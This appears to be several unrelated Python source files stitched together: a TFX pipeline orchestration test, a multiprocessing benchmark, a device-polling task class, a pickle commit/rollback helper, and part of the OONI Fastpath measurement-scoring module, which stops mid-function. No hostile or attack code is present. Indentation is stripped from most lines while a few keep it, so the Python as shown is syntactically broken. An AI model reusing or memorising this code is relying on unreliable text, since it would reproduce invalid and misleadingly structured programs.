pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(example_gen_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@parameterized.parameters(
_test_pipeline('pipeline1'),
_test_pipeline('pipeline1', pipeline_pb2.Pipeline.SYNC))
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
def test_mixed_service_node_stop_then_start_flow(self, pipeline,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
mock_service_job_manager = mock.create_autospec(
service_jobs.ServiceJobManager, instance=True)
mock_service_job_manager.is_pure_service_node.return_value = False
mock_service_job_manager.is_mixed_service_node.return_value = True
transform_node_uid = task_lib.NodeUid.from_pipeline_node(
pipeline, pipeline.nodes[0].pipeline_node)
pipeline_ops.initiate_pipeline_start(m, pipeline)
with pstate.PipelineState.load(
m, task_lib.PipelineUid.from_pipeline(pipeline)) as pipeline_state:
# Stop Transform.
with pipeline_state.node_state_update_context(
transform_node_uid) as node_state:
node_state.update(pstate.NodeState.STOPPING,
status_lib.Status(code=status_lib.Code.CANCELLED))
task_queue = tq.TaskQueue()
# Simulate ExecNodeTask for Transform already present in the task queue.
transform_task = test_utils.create_exec_node_task(
node_uid=transform_node_uid)
task_queue.enqueue(transform_task)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should not be called as there was an active
# ExecNodeTask for Transform which is a mixed service node.
mock_service_job_manager.stop_node_services.assert_not_called()
# Dequeue pre-existing transform task.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertEqual(transform_task, task)
# Dequeue CancelNodeTask for transform.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual(transform_node_uid, task.node_uid)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STOPPING, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
# stop_node_services should be called for Transform which is a mixed
# service node and corresponding ExecNodeTask has been dequeued.
mock_service_job_manager.stop_node_services.assert_called_once_with(
mock.ANY, 'Transform')
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STOPPED, node_state.state)
self.assertEqual(status_lib.Code.CANCELLED, node_state.status.code)
pipeline_ops.initiate_node_start(m, transform_node_uid)
pipeline_ops.orchestrate(m, task_queue, mock_service_job_manager)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
node_state = pipeline_state.get_node_state(transform_node_uid)
self.assertEqual(pstate.NodeState.STARTED, node_state.state)
@mock.patch.object(time, 'sleep')
def test_wait_for_predicate_timeout_secs_None(self, mock_sleep):
predicate_fn = mock.Mock()
predicate_fn.side_effect = [False, False, False, True]
pipeline_ops._wait_for_predicate(predicate_fn, 'testing', None)
self.assertEqual(predicate_fn.call_count, 4)
self.assertEqual(mock_sleep.call_count, 3)
predicate_fn.reset_mock()
mock_sleep.reset_mock()
predicate_fn.side_effect = [False, False, ValueError('test error')]
with self.assertRaisesRegex(ValueError, 'test error'):
pipeline_ops._wait_for_predicate(predicate_fn, 'testing', None)
self.assertEqual(predicate_fn.call_count, 3)
self.assertEqual(mock_sleep.call_count, 2)
def test_resume_manual_node(self):
pipeline = test_manual_node.create_pipeline()
runtime_parameter_utils.substitute_runtime_parameter(
pipeline, {
constants.PIPELINE_RUN_ID_PARAMETER_NAME: 'test-pipeline-run',
})
manual_node = pipeline.nodes[0].pipeline_node
with self._mlmd_connection as m:
pstate.PipelineState.new(m, pipeline)
contexts = context_lib.prepare_contexts(m, manual_node.contexts)
execution = execution_publish_utils.register_execution(
m, manual_node.node_info.type, contexts)
with mlmd_state.mlmd_execution_atomic_op(
mlmd_handle=m, execution_id=execution.id) as execution:
node_state_mlmd_value = execution.custom_properties.get(
manual_task_scheduler.NODE_STATE_PROPERTY_KEY)
node_state = manual_task_scheduler.ManualNodeState.from_mlmd_value(
node_state_mlmd_value)
self.assertEqual(node_state.state,
manual_task_scheduler.ManualNodeState.WAITING)
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
node_uid = task_lib.NodeUid(
node_id=manual_node.node_info.id, pipeline_uid=pipeline_uid)
pipeline_ops.resume_manual_node(m, node_uid)
with mlmd_state.mlmd_execution_atomic_op(
mlmd_handle=m, execution_id=execution.id) as execution:
node_state_mlmd_value = execution.custom_properties.get(
manual_task_scheduler.NODE_STATE_PROPERTY_KEY)
node_state = manual_task_scheduler.ManualNodeState.from_mlmd_value(
node_state_mlmd_value)
self.assertEqual(node_state.state,
manual_task_scheduler.ManualNodeState.COMPLETED)
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
def test_update_node_state_tasks_handling(self, mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline = _test_pipeline(
'pipeline1', execution_mode=pipeline_pb2.Pipeline.SYNC)
pipeline.nodes.add().pipeline_node.node_info.id = 'ExampleGen'
pipeline.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline.nodes.add().pipeline_node.node_info.id = 'Evaluator'
pipeline_uid = task_lib.PipelineUid.from_pipeline(pipeline)
eg_node_uid = task_lib.NodeUid(pipeline_uid, 'ExampleGen')
transform_node_uid = task_lib.NodeUid(pipeline_uid, 'Transform')
trainer_node_uid = task_lib.NodeUid(pipeline_uid, 'Trainer')
evaluator_node_uid = task_lib.NodeUid(pipeline_uid, 'Evaluator')
with pipeline_ops.initiate_pipeline_start(m, pipeline) as pipeline_state:
# Set initial states for the nodes.
with pipeline_state.node_state_update_context(
eg_node_uid) as node_state:
node_state.update(pstate.NodeState.RUNNING)
with pipeline_state.node_state_update_context(
transform_node_uid) as node_state:
node_state.update(pstate.NodeState.STARTING)
with pipeline_state.node_state_update_context(
trainer_node_uid) as node_state:
node_state.update(pstate.NodeState.STARTED)
with pipeline_state.node_state_update_context(
evaluator_node_uid) as node_state:
node_state.update(pstate.NodeState.RUNNING)
mock_sync_task_gen.return_value.generate.side_effect = [
[
task_lib.UpdateNodeStateTask(
node_uid=eg_node_uid, state=pstate.NodeState.COMPLETE),
task_lib.UpdateNodeStateTask(
node_uid=trainer_node_uid, state=pstate.NodeState.RUNNING),
task_lib.UpdateNodeStateTask(
node_uid=evaluator_node_uid,
state=pstate.NodeState.FAILED,
status=status_lib.Status(
code=status_lib.Code.ABORTED, message='foobar error'))
],
]
task_queue = tq.TaskQueue()
pipeline_ops.orchestrate(m, task_queue,
service_jobs.DummyServiceJobManager())
self.assertEqual(1, mock_sync_task_gen.return_value.generate.call_count)
with pstate.PipelineState.load(m, pipeline_uid) as pipeline_state:
self.assertEqual(pstate.NodeState.COMPLETE,
pipeline_state.get_node_state(eg_node_uid).state)
self.assertEqual(
pstate.NodeState.STARTED,
pipeline_state.get_node_state(transform_node_uid).state)
self.assertEqual(pstate.NodeState.RUNNING,
pipeline_state.get_node_state(trainer_node_uid).state)
self.assertEqual(
pstate.NodeState.FAILED,
pipeline_state.get_node_state(evaluator_node_uid).state)
self.assertEqual(
status_lib.Status(
code=status_lib.Code.ABORTED, message='foobar error'),
pipeline_state.get_node_state(evaluator_node_uid).status)
if __name__ == '__main__':
tf.test.main()
|
mp_benchmarks.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, multiprocessing, threading, queue, gc
# time.clock was removed in Python 3.8; perf_counter is monotonic and works on
# every platform, so the old win32 special case is no longer needed.
_timer = time.perf_counter
delta = 1
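# Each benchmark below doubles `iterations` until a single run takes at least
# `delta` seconds, then reports the throughput of that final run.  In the queue
# and pipe tests the Condition is only used as a start signal, so timing begins
# once the worker is already running.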
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
    for i in range(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
    print(iterations, 'objects passed through the queue in', elapsed, 'seconds')
    print('average number/sec:', iterations / elapsed)
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
    for i in range(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
    print(iterations, 'objects passed through connection in', elapsed, 'seconds')
    print('average number/sec:', iterations / elapsed)
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
        for i in range(iterations):
a = seq[5]
elapsed = _timer()-t
    print(iterations, 'iterations in', elapsed, 'seconds')
    print('average number/sec:', iterations / elapsed)
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
        for i in range(iterations):
l.acquire()
l.release()
elapsed = _timer()-t
    print(iterations, 'iterations in', elapsed, 'seconds')
    print('average number/sec:', iterations / elapsed)
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
    for i in range(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
        for i in range(iterations):
c.notify()
c.wait()
elapsed = _timer()-t
c.release()
p.join()
    print(iterations * 2, 'waits in', elapsed, 'seconds')
    print('average number/sec:', iterations * 2 / elapsed)
####
def test():
manager = multiprocessing.Manager()
gc.disable()
    print('\n\t######## testing queue.Queue\n')
    test_queuespeed(threading.Thread, queue.Queue(), threading.Condition())
    print('\n\t######## testing multiprocessing.Queue\n')
    test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
                    multiprocessing.Condition())
    print('\n\t######## testing Queue managed by server process\n')
    test_queuespeed(multiprocessing.Process, manager.Queue(),
                    manager.Condition())
    print('\n\t######## testing multiprocessing.Pipe\n')
    test_pipespeed()
    print()
    print('\n\t######## testing list\n')
    test_seqspeed(range(10))
    print('\n\t######## testing list managed by server process\n')
    test_seqspeed(manager.list(range(10)))
    print('\n\t######## testing Array("i", ..., lock=False)\n')
    test_seqspeed(multiprocessing.Array('i', range(10), lock=False))
    print('\n\t######## testing Array("i", ..., lock=True)\n')
    test_seqspeed(multiprocessing.Array('i', range(10), lock=True))
    print()
    print('\n\t######## testing threading.Lock\n')
    test_lockspeed(threading.Lock())
    print('\n\t######## testing threading.RLock\n')
    test_lockspeed(threading.RLock())
    print('\n\t######## testing multiprocessing.Lock\n')
    test_lockspeed(multiprocessing.Lock())
    print('\n\t######## testing multiprocessing.RLock\n')
    test_lockspeed(multiprocessing.RLock())
    print('\n\t######## testing lock managed by server process\n')
    test_lockspeed(manager.Lock())
    print('\n\t######## testing rlock managed by server process\n')
    test_lockspeed(manager.RLock())
    print()
    print('\n\t######## testing threading.Condition\n')
    test_conditionspeed(threading.Thread, threading.Condition())
    print('\n\t######## testing multiprocessing.Condition\n')
    test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
    print('\n\t######## testing condition managed by a server process\n')
    test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
SICS.py
|
from threading import Thread
from time import sleep
import requests
from core.data.command import Command
from core.device.manager import DeviceManager
from core.task.abstract import BaseTask
class MeasureWeight(BaseTask):
def __init__(self, config):
self.__dict__.update(config)
required = ['sleep_period', 'device_id', 'task_id']
self.validate_attributes(required, type(self).__name__)
self.device = DeviceManager().get_device(self.device_id)
super(MeasureWeight, self).__init__()
def start(self):
t = Thread(target=self._run)
t.start()
def _run(self):
while self.is_active:
cmd = Command(self.device_id, "1", [], self.task_id)
self.device.post_command(cmd)
sleep(int(self.sleep_period))
def end(self):
self.is_active = False
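# Minimal usage sketch (hypothetical config values; DeviceManager and the task
# registry must already be wired up by the surrounding application):
#   task = MeasureWeight({'sleep_period': 5, 'device_id': 'scale-1', 'task_id': 't1'})
#   task.start()   # spawns the polling thread that posts command "1" to the device
#   task.end()     # clears is_active so the loop exits after the current sleep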
|
modulo_serializar.py
|
# License: Released under MIT License
# Notice: Copyright (c) 2020 TytusDB Team
# Developer: Andree Avalos
import pickle
import threading
path = 'data/dict/'
def commit(objeto, nombre):
    """Serialize `objeto` to data/dict/<nombre>.bin; failures are silently ignored."""
    try:
        with open(path + nombre + ".bin", "wb") as file:
            file.write(pickle.dumps(objeto))
    except Exception:
        pass
def rollback(nombre):
    """Load the last committed snapshot; return an empty dict if it is missing or unreadable."""
    try:
        with open(path + nombre + ".bin", "rb") as file:
            return pickle.loads(file.read())
    except Exception:
        return {}
def hacerCommit(objeto, nombre):
    """Run commit() in a daemon thread so the caller is not blocked by disk I/O."""
    h1 = threading.Thread(target=commit, args=(objeto, nombre), daemon=True)
    h1.start()
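# Usage sketch (assumes the data/dict/ directory already exists):
#   hacerCommit({'id': 1}, 'tabla')   # serialize asynchronously in a daemon thread
#   datos = rollback('tabla')         # returns {} when nothing has been committed yet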
|
core.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
OONI Fastpath
See README.adoc
"""
# Compatible with Python3.6 and 3.7 - linted with Black
# debdeps: python3-setuptools
from argparse import ArgumentParser, Namespace
from base64 import b64decode
from configparser import ConfigParser
from datetime import datetime
from pathlib import Path
from tempfile import NamedTemporaryFile
from typing import Iterator, Dict, Any
import hashlib
import logging
import multiprocessing as mp
import os
import sys
import time
import yaml
import ujson # debdeps: python3-ujson
try:
from systemd.journal import JournalHandler # debdeps: python3-systemd
no_journal_handler = False
except ImportError:
# this will be the case on macOS for example
no_journal_handler = True
# Feeds measurements from S3
import fastpath.s3feeder as s3feeder
# Feeds measurements from a local HTTP API
from fastpath.localhttpfeeder import start_http_api
# Push measurements into Postgres
import fastpath.db as db
from fastpath.metrics import setup_metrics
from fastpath.mytypes import MsmtTup
import fastpath.portable_queue as queue
import fastpath.utils
LOCALITY_VALS = ("general", "global", "country", "isp", "local")
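# Most score_* functions below start from a dict with one "blocking_<locality>"
# key per LOCALITY_VALS entry, all initialized to 0.0, and then mostly adjust
# blocking_general.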
NUM_WORKERS = 3
log = logging.getLogger("fastpath")
metrics = setup_metrics(name="fastpath")
conf = Namespace()
fingerprints = None
def parse_date(d):
return datetime.strptime(d, "%Y-%m-%d").date()
def setup_dirs(conf, root):
"""Setup directories creating them if needed"""
conf.vardir = root / "var/lib/fastpath"
conf.cachedir = conf.vardir / "cache"
conf.s3cachedir = conf.cachedir / "s3"
# conf.outdir = conf.vardir / "output"
for p in (
conf.vardir,
conf.cachedir,
conf.s3cachedir,
):
p.mkdir(parents=True, exist_ok=True)
def setup():
os.environ["TZ"] = "UTC"
global conf
ap = ArgumentParser(__doc__)
ap.add_argument("--start-day", type=lambda d: parse_date(d))
ap.add_argument("--end-day", type=lambda d: parse_date(d))
ap.add_argument("--devel", action="store_true", help="Devel mode")
ap.add_argument("--noapi", action="store_true", help="Do not start API feeder")
ap.add_argument("--stdout", action="store_true", help="Log to stdout")
ap.add_argument("--db-uri", help="Database DSN or URI.")
ap.add_argument(
"--update",
action="store_true",
help="Update summaries and files instead of logging an error",
)
ap.add_argument(
"--stop-after", type=int, help="Stop after feeding N measurements", default=None
)
ap.add_argument(
"--no-write-to-db",
action="store_true",
help="Do not insert measurement in database",
)
ap.add_argument(
"--keep-s3-cache",
action="store_true",
help="Keep files downloaded from S3 in the local cache",
)
conf = ap.parse_args()
if conf.devel or conf.stdout or no_journal_handler:
format = "%(relativeCreated)d %(process)d %(levelname)s %(name)s %(message)s"
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format=format)
else:
log.addHandler(JournalHandler(SYSLOG_IDENTIFIER="fastpath"))
log.setLevel(logging.DEBUG)
# Run inside current directory in devel mode
root = Path(os.getcwd()) if conf.devel else Path("/")
conf.conffile = root / "etc/ooni/fastpath.conf"
log.info("Using conf file %s", conf.conffile)
cp = ConfigParser()
with open(conf.conffile) as f:
cp.read_file(f)
conf.collector_hostnames = cp["DEFAULT"]["collectors"].split()
log.info("collectors: %s", conf.collector_hostnames)
conf.s3_access_key = cp["DEFAULT"]["s3_access_key"].strip()
conf.s3_secret_key = cp["DEFAULT"]["s3_secret_key"].strip()
if conf.db_uri is None:
conf.db_uri = cp["DEFAULT"]["db_uri"].strip()
setup_dirs(conf, root)
def per_s(name, item_count, t0):
"""Generate a gauge metric of items per second"""
delta = time.time() - t0
if delta > 0:
metrics.gauge(f"{name}_per_s", item_count / delta)
@metrics.timer("clean_caches")
def clean_caches():
"""Cleanup local caches."""
# Access times are updated on file load.
# FIXME: use cache locations correctly
now = time.time()
threshold = 3600 * 24 * 3
for f in conf.s3cachedir.iterdir():
if not f.is_file():
continue
age_s = now - f.stat().st_atime
if age_s > threshold:
log.debug("Deleting %s", f)
metrics.gauge("deleted_cache_file_age", age_s)
# TODO: delete
# Currently unused: we could warn on missing / unexpected cols
expected_colnames = {
"accessible",
"advanced",
"agent",
"annotations",
"automated_testing",
"blocking",
"body_length_match",
"body_proportion",
"blocking_country",
"blocking_general",
"blocking_global",
"blocking_isp",
"blocking_local",
"client_resolver",
"control",
"control_failure",
"data_format_version",
"dns_consistency",
"dns_experiment_failure",
"engine_name",
"engine_version",
"engine_version_full",
"failure",
"failure_asn_lookup",
"failure_cc_lookup",
"failure_ip_lookup",
"failure_network_name_lookup",
"flavor",
"headers_match",
"http_experiment_failure",
"id",
"input",
"input_hashes",
"measurement_start_time",
"network_type",
"options",
"origin",
"phase_result",
"platform",
"probe_asn",
"probe_cc",
"probe_city",
"probe_ip",
"queries",
"receiver_data",
"registration_server_failure",
"registration_server_status",
"report_id",
"requests",
"retries",
"sender_data",
"server_address",
"server_port",
"server_version",
"simple",
"socksproxy",
"software_name",
"software_version",
"status_code_match",
"summary_data",
"tcp_connect",
"telegram_http_blocking",
"telegram_tcp_blocking",
"telegram_web_failure",
"telegram_web_status",
"test_c2s",
"test_helpers",
"test_name",
"test_runtime",
"test_s2c",
"test_start_time",
"test_suite",
"test_version",
"test_keys",
"title_match",
"web_connectivity",
"whatsapp_endpoints_blocked",
"whatsapp_endpoints_dns_inconsistent",
"whatsapp_endpoints_status",
"whatsapp_web_failure",
"whatsapp_web_status",
}
def prepare_for_json_normalize(report):
try:
d = report["test_keys"]["control"]["tcp_connect"]
d = {n: i for n, i in enumerate(d.items())}
report["test_keys"]["control"]["tcp_connect"] = tuple(d.items())
except KeyError:
pass
try:
h = report["test_keys"]["control"]["http_request"]["headers"]
report["test_keys"]["control"]["http_request"]["headers"] = tuple(h.items())
except KeyError:
pass
def process_measurements_from_s3(queue):
"""Pull measurements from S3 and place them in the queue"""
for measurement_tup in s3feeder.stream_cans(conf, conf.start_day, conf.end_day):
assert len(measurement_tup) == 3
msm_jstr, msm, msm_uid = measurement_tup
assert msm_jstr is None or isinstance(msm_jstr, (str, bytes)), type(msm_jstr)
assert msm is None or isinstance(msm, dict)
while queue.qsize() >= 500:
time.sleep(0.1)
assert measurement_tup is not None
queue.put(measurement_tup)
metrics.gauge("queue_size", queue.qsize())
@metrics.timer("match_fingerprints")
def match_fingerprints(measurement):
"""Match fingerprints against HTTP headers and bodies.
Used only on web_connectivity
"""
msm_cc = measurement["probe_cc"]
zzfps = fingerprints["ZZ"]
ccfps = fingerprints.get(msm_cc, {})
test_keys = measurement.get("test_keys", None)
if test_keys is None:
return []
matches = []
requests = test_keys.get("requests", ()) or ()
for req in requests:
r = req.get("response", None)
if r is None:
continue
# Match HTTP body if found
body = r["body"]
if isinstance(body, dict):
if "data" in body and body.get("format", "") == "base64":
log.debug("Decoding base64 body")
body = b64decode(body["data"])
                # returns bytes. bm.encode() below is faster than decoding it
else:
logbug(2, "incorrect body of type dict", measurement)
body = None
if body is not None:
for fp in zzfps["body_match"] + ccfps.get("body_match", []):
# fp: {"body_match": "...", "locality": "..."}
tb = time.time()
bm = fp["body_match"]
if isinstance(body, bytes):
idx = body.find(bm.encode())
else:
idx = body.find(bm)
if idx != -1:
matches.append(fp)
log.debug("matched body fp %s %r at pos %d", msm_cc, bm, idx)
# Used for statistics
metrics.gauge("fingerprint_body_match_location", idx)
per_s("fingerprints_bytes", len(body), tb)
del body
# Match HTTP headers if found
headers = r.get("headers", {})
if not headers:
continue
headers = {h.lower(): v for h, v in headers.items()}
for fp in zzfps["header_full"] + ccfps.get("header_full", []):
name = fp["header_name"]
if name in headers and headers[name] == fp["header_full"]:
matches.append(fp)
log.debug("matched header full fp %s %r", msm_cc, fp["header_full"])
for fp in zzfps["header_prefix"] + ccfps.get("header_prefix", []):
name = fp["header_name"]
prefix = fp["header_prefix"]
if name in headers and headers[name].startswith(prefix):
matches.append(fp)
log.debug("matched header prefix %s %r", msm_cc, prefix)
return matches
def all_keys_true(d, keys):
"""Check for values set to True in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, None) != True:
return False
return True
def all_keys_false(d, keys):
"""Check for values set to True in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, None) != False:
return False
return True
def all_keys_none(d, keys):
"""Check for values set to None in a dict"""
if isinstance(keys, str):
keys = (keys,)
for k in keys:
if d.get(k, True) != None:
return False
return True
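# Example: all_keys_true({"a": True}, "a") -> True; all_keys_none({"a": 0}, "a") -> False.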
def logbug(id: int, desc: str, msm: dict):
"""Log unexpected measurement contents, possibly due to a bug in the probe
The id helps locating the call to logbug()
"""
    # Current highest logbug id: 9
# TODO: use assertions for unknown bugs
rid = msm.get("report_id", "")
url = "https://explorer.ooni.org/measurement/{}".format(rid) if rid else "no rid"
sname = msm.get("software_name", "unknown")
sversion = msm.get("software_version", "unknown")
if id > 0:
# unknown, possibly new bug
log.warning("probe_bug %d: %s %s %s %s", id, sname, sversion, desc, url)
else:
log.info("known_probe_bug: %s %s %s %s", sname, sversion, desc, url)
def _detect_unknown_failure(tk):
"""Any field ending with _failure can contain `unknown_failure ...`
due to failed msmt
"""
for k in tk:
if k.endswith("_failure"):
v = tk[k] or ""
if v.startswith("unknown_failure"):
log.debug(f"unknown_failure in field {k}")
return True
return False
@metrics.timer("score_measurement_facebook_messenger")
def score_measurement_facebook_messenger(msm):
tk = msm["test_keys"]
del msm
# TODO: recompute all these keys in the pipeline
# If the value of these keys is false (inconsistent) there is something
# fishy
consistency_keys = [
"facebook_b_api_dns_consistent",
"facebook_b_api_reachable",
"facebook_b_graph_dns_consistent",
"facebook_b_graph_reachable",
"facebook_edge_dns_consistent",
"facebook_edge_reachable",
"facebook_external_cdn_dns_consistent",
"facebook_external_cdn_reachable",
"facebook_scontent_cdn_dns_consistent",
"facebook_scontent_cdn_reachable",
"facebook_star_dns_consistent",
"facebook_star_reachable",
"facebook_stun_dns_consistent",
]
# These are keys that if they are true it means there is something fishy
anomaly_keys = ["facebook_tcp_blocking", "facebook_dns_blocking"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# Workaround for 'facebook_dns_blocking': True
# See tests/test_functional.py:test_facebook_messenger*
trues = (
"facebook_b_api_dns_consistent",
"facebook_b_api_reachable",
"facebook_b_graph_dns_consistent",
"facebook_b_graph_reachable",
"facebook_dns_blocking",
"facebook_edge_dns_consistent",
"facebook_edge_reachable",
"facebook_star_dns_consistent",
"facebook_star_reachable",
"facebook_stun_dns_consistent",
)
if all_keys_true(tk, trues) and all_keys_false(tk, "facebook_tcp_blocking"):
score = 0
else:
score = 0
for key in consistency_keys:
v = tk.get(key, None)
if v == False:
score += 0.5
scores[key] = v
for key in anomaly_keys:
v = tk.get(key, None)
if v == True:
score += 0.5
scores[key] = v
scores["blocking_general"] = score
return scores
def _extract_tcp_connect(tk):
# https://github.com/ooni/spec/blob/master/data-formats/df-005-tcpconnect.md
# NOTE: this is *NOT* ts-008-tcp-connect.md
# First the probe tests N TCP connections
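    # Each tcp_connect entry is expected to look roughly like
    #   {"ip": "1.2.3.4", "port": 443, "status": {"success": true, "failure": null}}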
tcp_connect = tk.get("tcp_connect", [])
accessible_endpoints = 0
unreachable_endpoints = 0
for entry in tcp_connect:
s = entry.get("status", {})
success = s.get("success", None)
if success is True:
accessible_endpoints += 1
elif success is False:
unreachable_endpoints += 1
else:
pass # unknown
return accessible_endpoints, unreachable_endpoints
@metrics.timer("score_measurement_telegram")
def score_measurement_telegram(msm):
"""Calculate measurement scoring for Telegram.
Returns a scores dict
"""
# Ignore tcp_blocking, http_blocking and web_failure from the probe
tk = msm["test_keys"]
del msm
web_status = tk.get("telegram_web_status", None)
if web_status == "ok":
web_blocking = False
elif web_status == "blocked":
web_blocking = True
else:
# unknown
web_blocking = None
accessible_endpoints, unreachable_endpoints = _extract_tcp_connect(tk)
# Then the probe tests N HTTP connections
http_success_cnt = 0
http_failure_cnt = 0
web_failure = None
requests = tk.get("requests", ()) or ()
for request in requests:
if "request" not in request:
# client bug
continue
if request["request"]["url"] in (
"https://web.telegram.org/",
"http://web.telegram.org/",
):
if request["failure"] is not None:
web_failure = request["failure"]
# TODO extract_html_title(request["response"]["body"] and check if
# it matches "Telegram Web"
# see: https://github.com/measurement-kit/measurement-kit/blob/f63ed8b7f186dbb27cf32489216826752d070620/src/libmeasurement_kit/ooni/telegram.cpp#L101
# We skip the telegram web requests for counting the
# http_success_cnt
continue
if request["failure"] is None:
http_success_cnt += 1
else:
# TODO also consider looking at request["response"]["body"] to
# match the expected telegram backend response
http_failure_cnt += 1
# Scoring
if (accessible_endpoints + unreachable_endpoints) > 0:
s = unreachable_endpoints / (accessible_endpoints + unreachable_endpoints)
else:
s = 0.5
if (http_failure_cnt + http_success_cnt) > 0:
s += http_failure_cnt / (http_failure_cnt + http_success_cnt)
else:
s += 0.5
if web_blocking:
s += 1
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
scores["blocking_general"] = s
scores["web_failure"] = web_failure
scores["accessible_endpoints"] = accessible_endpoints
scores["unreachable_endpoints"] = unreachable_endpoints
scores["http_success_cnt"] = http_success_cnt
scores["http_failure_cnt"] = http_failure_cnt
if web_failure is not None:
scores["msg"] = "Telegam failure: {}".format(web_failure)
return scores
@metrics.timer("score_measurement_hhfm")
def score_measurement_hhfm(msm):
"""Calculate http_header_field_manipulation"""
tk = msm["test_keys"]
rid = msm["report_id"]
del msm
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
# See test_functional.py:test_score_measurement_hhfm_stats
#
# exp_req_failure = tk["requests"][0].get("failure", None)
# if exp_req_failure is not None:
# # failure state set by probe
# scores["blocking_general"] = 0.5
# return scores
# response->body contains a JSON document like:
# {"headers_dict": {"acCePT-languagE": ["en-US,en;q=0.8"], ...},
# "request_line": "geT / HTTP/1.1",
# "request_headers": [ ["Connection", "close"], ... ]
# }
try:
resp = tk["requests"][0].get("response", {})
except (KeyError, IndexError):
        # See 20191028T115649Z_AS28573_eIrzDM4njwMjxBi0ODrerI5N03zM7qQoCvl4xpapTccdW0kCRg
scores["blocking_general"] = 0.0
return scores
# See 20191027T002012Z_AS45595_p2qNg0FmL4d2kIuLQXEn36MbraErPPA5i64eE1e6nLfGluHpLk
if resp is None:
# Broken test?
scores["blocking_general"] = 0.0
return scores
resp_body = resp.get("body", None)
if resp_body is None:
scores["total_tampering"] = True
scores["blocking_general"] = 1.0
scores["msg"] = "Empty body"
return scores
# Compare sent and received HTTP headers
try:
ctrl_headers = ujson.loads(resp_body)["headers_dict"]
except:
scores["blocking_general"] = 1.0
scores["msg"] = "Malformed ctrl_headers"
return scores
# "unpack" value and turn into a set of tuples to run a comparison
ctrl = set((k, v[0]) for k, v in ctrl_headers.items())
exp_req_headers = tk["requests"][0].get("request", {}).get("headers", {})
expected = set(exp_req_headers.items())
# The "Connection" header is not always handled correctly
ctrl.discard(("Connection", "close"))
expected.discard(("Connection", "close"))
if expected == ctrl:
return scores
# Headers have been manipulated!
scores["blocking_general"] = 1.1
diff = expected ^ ctrl
scores["msg"] = "{} unexpected header change".format(len(diff))
# TODO: distinguish proxies lowercasing/fixing headers
# or adding "benign" Via, Connection, X-BlueCoat-Via, X-Forwarded-For
# headers?
return scores
@metrics.timer("score_http_invalid_request_line")
def score_http_invalid_request_line(msm):
"""Calculate measurement scoring for http_invalid_request_line"""
# https://github.com/ooni/spec/blob/master/nettests/ts-007-http-invalid-request-line.md
tk = msm["test_keys"]
rid = msm["report_id"]
scores = {f"blocking_{l}": 0.0 for l in LOCALITY_VALS}
sent = tk.get("sent", [])
received = tk.get("received", [])
if not len(sent) and not len(received):
scores["accuracy"] = 0.0
return scores
# Compare sent and received HTTP headers
anomaly = False
for s, r in zip(sent, received):
if s != r:
anomaly = True
# We ignore the tampering flag due to: https://github.com/ooni/probe/issues/1278
